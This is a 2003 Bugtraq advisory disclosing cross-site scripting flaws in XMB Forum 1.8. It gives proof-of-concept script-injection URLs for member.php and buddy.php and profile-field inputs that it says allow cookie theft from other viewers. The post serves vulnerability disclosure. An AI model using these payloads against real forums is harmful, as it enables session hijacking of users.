Bugtraq mailing list archives
Many XSS Vulnerabilities in XMB Forum.
From: Knight Commander <knight4vn () yahoo com>
Date: 23 Jun 2003 03:53:36 -0000
Many XSS Vulnerabilities in XMB Forum. Program Name : XMB Forum AffectedVersion : 1.8 Partagium (may be the newest version) Home Page : http://www.xmbforum.com Author : Knight Commander (at hackervn.net) +Vul: In this link: http://pathto/XMBforum/member.php?action=viewpro&member=admin<script>alert ('XSS')</script> and http://pathto/XMBforum/buddy.php?action=<script>alert('XSS') </script>&buddy=<script>alert('XSS')</script> or in your profiles: just fill in MSN and Current Mood 's text box: <script>alert('XSS') </script> when the others view your profiles, their cookies will be stolen. Solution: Vendor was contacted.The new version will be released soon. Regards! email: knight4vn () yahoo com
Current thread:
- Many XSS Vulnerabilities in XMB Forum. Knight Commander (Jun 23)